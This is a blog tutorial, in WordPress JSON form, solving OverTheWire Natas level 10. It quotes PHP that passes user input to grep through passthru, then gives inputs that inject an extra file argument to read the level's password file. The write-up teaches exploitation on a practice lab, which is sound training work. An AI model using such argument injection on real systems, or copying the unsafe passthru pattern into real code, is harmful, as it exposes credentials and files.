{"id":2023,"date":"2016-10-26T15:22:05","date_gmt":"2016-10-26T15:22:05","guid":{"rendered":"https:\/\/www.hackmethod.com\/?p=2023"},"modified":"2018-12-12T19:14:28","modified_gmt":"2018-12-12T19:14:28","slug":"overthewire-natas-10","status":"publish","type":"post","link":"https:\/\/hackmethod.com\/overthewire-natas-10\/","title":{"rendered":"OvertheWire &#8211; Natas 10"},"content":{"rendered":"<div class=\"entry-content\">\n<p class=\"entry-content\"><strong>Recap of Last Lesson:<\/strong> We learned more about command injection and how to exploit it. We also revisited directory traversal attacks.<\/p>\n<p class=\"entry-content\"><a href=\"http:\/\/natas10.natas.labs.overthewire.org\/\"><strong>Natas Level 10<\/strong><\/a><\/p>\n<h4 class=\"entry-content\"><strong>Objective:<\/strong><\/h4>\n<p class=\"entry-content\">Find the password to log into level 11.<\/p>\n<h4 class=\"entry-content\"><strong>Intel Given:<\/strong><\/h4>\n<div class=\"entry-content\">\n<ul>\n<li>URL: http:\/\/natas10.natas.labs.overthewire.org\/<\/li>\n<li>Source code available<\/li>\n<\/ul>\n<\/div>\n<p><!--more--><\/p>\n<h4><strong>How to:<\/strong><\/h4>\n<p>Once more, we have access to the source code of the application. Lets take a <a href=\"https:\/\/www.hackmethod.com\/wp-content\/uploads\/2016\/10\/Screen-Shot-2016-10-26-at-7.49.33-AM.png\">quick look<\/a>. The source code looks very similar to last time. Since it looks almost exactly the same, I&#8217;ve chosen to diff the two files to see what the differences are. I used https:\/\/www.diffchecker.com but there are many tools that you can use to do it. Here is a <a href=\"https:\/\/www.hackmethod.com\/wp-content\/uploads\/2016\/10\/Screen-Shot-2016-10-26-at-7.52.55-AM.png\">screenshot<\/a> of my output. Lets examine the code that changed.<br \/>\n<code><br \/>\nif(preg_match('\/[;|&amp;]\/',$key)) {<br \/>\nprint \"Input contains an illegal character!\";<br \/>\n} else {<br \/>\npassthru(\"grep -i $key dictionary.txt\");<br \/>\n}<br \/>\n<\/code><\/p>\n<\/div>\n<p>It seems that the only change is that they added a filter, heeding our advice for input filtering.<\/p>\n<p>Seemingly unable to add on additional commands to the passthru function, we can still try to be creative in thinking up an alternate solution. Lets breakdown the grep command.<\/p>\n<p><code><br \/>\ngrep -i $key dictionary.txt<br \/>\n<\/code><br \/>\ngrep &#8211; executes \/bin\/grep<br \/>\n-i &#8211; Perform case insensitive matching.<br \/>\n$key &#8211; Our user controllable parameter<br \/>\ndictionary.txt &#8211; the file to search<\/p>\n<p>Lets see is we can exploit the logic of the grep query. First we have the command, then a flag, then an option, then a value, and lastly, the file to read from. What if we could change the file that is read from? Perhaps we could have it search the password file.<\/p>\n<p>We will try to figure out how the password file is defined. We see that it comes after the search query. Lets take a quick look at the man page for grep. You will notice something interesting.<\/p>\n<pre><code>The grep utility searches any given input files\n<\/code><\/pre>\n<p>Do you see that &#8220;s&#8221; at the end of file? This means we can search multiple files in a single grep command. This means we can search both the password file and dictionary.txt<\/p>\n<p>Try this query:<br \/>\na \/etc\/natas_webpass\/natas11<\/p>\n<p>We can assume that this will send the command:<\/p>\n<p><code>grep -i a \/etc\/natas_webpass\/natas11 dictionary.txt<\/code><\/p>\n<p>searching both &#8220;\/etc\/natas_webpass\/natas11&#8221; and &#8220;dictionary.txt&#8221; for the letter a.<\/p>\n<p>You will also notice, that this doesn&#8217;t get us the results we want. Why not? Because in order for the password to be returned, we need the letter &#8220;a&#8221; to be present in the password. Let&#8217;s try picking a couple of other random letters and see if we can find a match.<\/p>\n<p>Try this query:<br \/>\nu \/etc\/natas_webpass\/natas11<\/p>\n<p><a href=\"https:\/\/www.hackmethod.com\/wp-content\/uploads\/2016\/10\/Screen-Shot-2016-10-26-at-8.17.13-AM.png\">Success!<\/a><\/p>\n<div class=\"entry-content\">\n<h4 class=\"entry-content\"><strong>Conclusion:<\/strong><\/h4>\n<div class=\"entry-content\">In this lesson we learned about additional ways we can exploit a command injection vulnerability. Last time we learned how to append additional commands, and in this lesson we learned how to analyze the logic of an application and use it in a way the developer did not intend.<\/p>\n<\/div>\n<\/div>\n<p><!--more--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Recap of Last Lesson: We learned more about command injection and how to exploit it. We also revisited directory traversal attacks. Natas Level 10 Objective: Find the password to log into level 11. Intel Given: URL: http:\/\/natas10.natas.labs.overthewire.org\/ Source code available<\/p>\n","protected":false},"author":9,"featured_media":2156,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":true,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[44,49],"tags":[57,45,46],"class_list":["post-2023","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-overthewire","category-tutorials","tag-natas","tag-overthewire","tag-tutorials"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2017\/02\/WP_SiteLogo_512x512.png?fit=512%2C506&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p5zY4D-wD","_links":{"self":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/2023","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/comments?post=2023"}],"version-history":[{"count":5,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/2023\/revisions"}],"predecessor-version":[{"id":5236,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/2023\/revisions\/5236"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/media\/2156"}],"wp:attachment":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/media?parent=2023"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/categories?post=2023"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/tags?post=2023"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}